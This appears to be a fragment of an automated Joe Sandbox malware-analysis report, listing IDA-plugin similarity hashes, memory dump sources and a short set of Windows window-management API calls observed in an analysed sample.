                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: HeapProcess
                                    • String ID:
                                    • API String ID: 54951025-0
                                    • Opcode ID: 6b97a42aa98a02b755de557683dbc6a338b8131d1c6ad92c12585849f1041147
                                    • Instruction ID: 7e8cb997c7610d0b92e37fd624a8458ef6d1c3c4b4ced7aa983e791497c7bc3d
                                    • Opcode Fuzzy Hash: 6b97a42aa98a02b755de557683dbc6a338b8131d1c6ad92c12585849f1041147
                                    • Instruction Fuzzy Hash: FBA00474501141CFD751DF755D0D30D37DD75457D1F45C155550DC5170D73445505F01
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                     • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8a6e4fef8a49dcc930715721b7d4fffbd12b6467634e9eef11ded152ea66fbae
                                    • Instruction ID: 135152e95a559892dd33d1daf96ef8715976fe7f5037692a10b0ae5b9daebb5c
                                    • Opcode Fuzzy Hash: 8a6e4fef8a49dcc930715721b7d4fffbd12b6467634e9eef11ded152ea66fbae
                                    • Instruction Fuzzy Hash: EE623871604B848FCB26CF38C891AB9BBE1AF95305F45896DDC9A8B752D730F949CB10
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                     • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 575a8806441ce9a72c04ae9113137d22797e0c306676329538b0a0bf3ae15e30
                                    • Instruction ID: 907a4744969fcc567f63f15137aa544e43c066280656c7b2b7277cc9831ab00b
                                    • Opcode Fuzzy Hash: 575a8806441ce9a72c04ae9113137d22797e0c306676329538b0a0bf3ae15e30
                                    • Instruction Fuzzy Hash: 27622570608B869FC71ACF28D8809B9FBE1BF55305F14866DDC968B752D730EA59CB80
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                     • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d5448180e84c52624f7729a892eb382d9b2428a7fa06f80140d36ae3f2e7eaf5
                                    • Instruction ID: c01e30a5a923341fb15e8b7534905efea5acbe97fe3b091b03ef378ec9320c02
                                    • Opcode Fuzzy Hash: d5448180e84c52624f7729a892eb382d9b2428a7fa06f80140d36ae3f2e7eaf5
                                    • Instruction Fuzzy Hash: DA523B726087058FC718CF19C891A6AF7E1FFCC304F498A2DE5859B255D734EA19CB86
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                     • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: dcad3ff3355eaa410b25e6cf6505ebf09517f6523d720f95d170c56cd33ab1f5
                                    • Instruction ID: d9db0ddc9b15da707f292801f63fa44687d086f58fc0f5ae8ee23db32e37a269
                                    • Opcode Fuzzy Hash: dcad3ff3355eaa410b25e6cf6505ebf09517f6523d720f95d170c56cd33ab1f5
                                    • Instruction Fuzzy Hash: AA1215B17147068BC72ACF28C9D1AB9B3E0FF54309F50892DD997CBA91D374A898CB45
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                     • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a4e882376456da13d0eed3c9278cfe209a44d47289edbcdea851345c578dafbf
                                    • Instruction ID: ccf058c40fb45ad821cbaa118ce7430cbc0677393e84b6828d2bdea7dea18c55
                                    • Opcode Fuzzy Hash: a4e882376456da13d0eed3c9278cfe209a44d47289edbcdea851345c578dafbf
                                    • Instruction Fuzzy Hash: 47F1CA7562A3018FC79ACF28C48096EBBE5EFC9314F149A2EF4859B252D730E945CF42
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                     • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                    • Instruction ID: b8e75eb97b510dd6eea128e2f58b7a9668e1ce2d21feac37abfa4f351de84b69
                                    • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                    • Instruction Fuzzy Hash: 03C193762150A30ADF2F4639853603FBBA15AA27B131B875DD4B3CF1D8FE20D664DA20
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                     • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                    • Instruction ID: c2752ab6e2372d4d97fcced55a60ff483f279659cd83c7b14a22e64d976b0534
                                    • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                    • Instruction Fuzzy Hash: F2C1A2762151930ADF2E463AC53503FBBA15AA27B131F876DD4B3CB5C8FE20D664DA20
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                     • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                    • Instruction ID: 833fb46b5525271db47a3936b671b37bec1b370396b8b02963ee54e2d403ae2e
                                    • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                    • Instruction Fuzzy Hash: 82C1A4762051530ADF2E4639C57603FBBA15EA27B131B876DD4B3CB0D9FE20D664DA20
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                     • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: H_prolog
                                    • String ID:
                                    • API String ID: 3519838083-0
                                    • Opcode ID: c801524508b69716376c0583446b354be67f5720f2f8b33d6ff9eaee7deaf98d
                                    • Instruction ID: 1b87f72f87f31969003f9bce01aa29df730a8c0f0c1306f6afdeac49965f4f5f
                                    • Opcode Fuzzy Hash: c801524508b69716376c0583446b354be67f5720f2f8b33d6ff9eaee7deaf98d
                                    • Instruction Fuzzy Hash: 0CD125B1A043418FDB16CF28C882B5BBBE0BF84309F45456DEC859B662D734E95CCB96
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                     • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                    • Instruction ID: 900884dafdba21f2ce10fe70ac66b0a770e5d6900a8312f43d5dad136541b710
                                    • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                    • Instruction Fuzzy Hash: 14C1B9762091530ADF2F463AC53603FBBA15AA27B131B876DD4B3CB1D9FE10D564DA20
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                     • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 36cd1e6ce04e7a7cc9ec160a8d1a02a97ca3051ea561bd83c3513f176893f35e
                                    • Instruction ID: cab0d328ac2593fec65277ae73e2729197c72e72cb1e31bd375134029de6590a
                                    • Opcode Fuzzy Hash: 36cd1e6ce04e7a7cc9ec160a8d1a02a97ca3051ea561bd83c3513f176893f35e
                                    • Instruction Fuzzy Hash: A0E138755183848FC306CF29D49196ABBF0BF8A300F85099EF9D597392C335EA19DB62
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                     • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4b6a3d46f10441a3051e9d0d7f9b8667803012905bf4d198d95ae77b69715ff4
                                    • Instruction ID: f2e019e2db48fe3b43a9166a4392ae6e202a90d25f7c7167120c52943c16c376
                                    • Opcode Fuzzy Hash: 4b6a3d46f10441a3051e9d0d7f9b8667803012905bf4d198d95ae77b69715ff4
                                    • Instruction Fuzzy Hash: 2B9168702447498BDB26EF68C890FBA77E5EB90341F10092DED978B292DA74E74CC742
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                     • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e0fb905632f7de8fa4f2e060577effe299f870fbd26c017fb9c01934ee34a85c
                                    • Instruction ID: 811af76914915e6df7b25449f051289c42ec57be4da545a0f7c60ec1f1b34e7a
                                    • Opcode Fuzzy Hash: e0fb905632f7de8fa4f2e060577effe299f870fbd26c017fb9c01934ee34a85c
                                    • Instruction Fuzzy Hash: 7C618971E8070876DE3B9AA8D895BBF23D8DB02700F15CA19E883DF68DD651DD42C359
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                     • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2fa2980f550074fd9d5fffc8fceb723f20dffd391df208c388f2810114909e4d
                                    • Instruction ID: 73d2afdccf0cb3de04fda2c131422384a241d610f3d10f9503b9bc507becd718
                                    • Opcode Fuzzy Hash: 2fa2980f550074fd9d5fffc8fceb723f20dffd391df208c388f2810114909e4d
                                    • Instruction Fuzzy Hash: 5C7149716043454BDB36DE68C8D1FAE77E4ABA0385F00092DFD868F292DA74DA8D8752
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                     • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1d25a7c413b64cc1c4dee81fed1a27e24b1c019bc61537549567cd7e8aefb3c1
                                    • Instruction ID: 3c290e70ff31b7df63f272e44a898fc293e0f86f54ad34f88a861e9fcef5b6f1
                                    • Opcode Fuzzy Hash: 1d25a7c413b64cc1c4dee81fed1a27e24b1c019bc61537549567cd7e8aefb3c1
                                    • Instruction Fuzzy Hash: 7551AC70F00B845BDB3799688955BFF27DD9B53300F19C929E992DB68EC306ED418392
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                     • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 83d46a0eb9b16d9fb8190896605abfffd559bc94c7ece19bbfaf9e5a9707d923
                                    • Instruction ID: d97625ba3bc7a1596a69d8dce86f21af8d2196c40f226eed2ee8d52eddbc0337
                                    • Opcode Fuzzy Hash: 83d46a0eb9b16d9fb8190896605abfffd559bc94c7ece19bbfaf9e5a9707d923
                                    • Instruction Fuzzy Hash: 14818FA221D7D49DCB178F7D38A52B53FE95773340F2900EAC4C68A2A3D536499CE721
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                     • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 3f0624bdb911303c16bd666d63a2f52f8921e50211ec19205fccf559132ab001
                                    • Instruction ID: e28a68af6f3fd9169333195ba75dacf233b56dfb3c6068d8b3e383e34cdba321
                                    • Opcode Fuzzy Hash: 3f0624bdb911303c16bd666d63a2f52f8921e50211ec19205fccf559132ab001
                                    • Instruction Fuzzy Hash: FB51DF319083D24FC713CF24919446EBFE1BE9A718F5A489EE4D54F252D320E64ACB92
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                     • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 3556025a4a0a182b85787fd333121734c8b5bcb42d5be6fe646c51e9006ceabe
                                    • Instruction ID: 49ad135dbbf85386c9fedbc670e8a0d81bfec2256027599403970160b4b83b6a
                                    • Opcode Fuzzy Hash: 3556025a4a0a182b85787fd333121734c8b5bcb42d5be6fe646c51e9006ceabe
                                    • Instruction Fuzzy Hash: 46512571A083029FC748CF19D49059AF7E1FF88354F058A2EE899E7740DB34EA59CB96
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                     • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 680dd35d5b71cc1049d84931067584ed44f7cee91fcb56c6d02cf908e44fe073
                                    • Instruction ID: 6a2eb9496aadaf896bf4fdf2102de823c9898fcc9b5b4cd1d6bb07ec60ffcf09
                                    • Opcode Fuzzy Hash: 680dd35d5b71cc1049d84931067584ed44f7cee91fcb56c6d02cf908e44fe073
                                    • Instruction Fuzzy Hash: 4231F2B1A447458FCB25DF28C85166ABBE0FB95301F10492DE8E5CB742C739EA4DCB92
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                     • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: db2b84e78e96028aebbce328002f261d468f46bf530efb089a62100d18e46a92
                                    • Instruction ID: 0a738d51b242bff35467485dcf66615c3459de2849d8889b1b81c972c486d601
                                    • Opcode Fuzzy Hash: db2b84e78e96028aebbce328002f261d468f46bf530efb089a62100d18e46a92
                                    • Instruction Fuzzy Hash: B9210A32A201218FCB59CF2DDCD0C3A7795A78A311B47816BEA46CB2D1C534F965CBA0
                                    APIs
                                    • _swprintf.LIBCMT ref: 0034DABE
                                      • Part of subcall function 0034400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0034401D
                                      • Part of subcall function 00351596: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00380EE8,00000200,0034D202,00000000,?,00000050,00380EE8), ref: 003515B3
                                    • _strlen.LIBCMT ref: 0034DADF
                                    • SetDlgItemTextW.USER32(?,0037E154,?), ref: 0034DB3F
                                    • GetWindowRect.USER32(?,?), ref: 0034DB79
                                    • GetClientRect.USER32(?,?), ref: 0034DB85
                                    • GetWindowLongW.USER32(?,000000F0), ref: 0034DC25
                                    • GetWindowRect.USER32(?,?), ref: 0034DC52
                                    • SetWindowTextW.USER32(?,?), ref: 0034DC95
                                    • GetSystemMetrics.USER32(00000008), ref: 0034DC9D
                                    • GetWindow.USER32(?,00000005), ref: 0034DCA8
                                    • GetWindowRect.USER32(00000000,?), ref: 0034DCD5
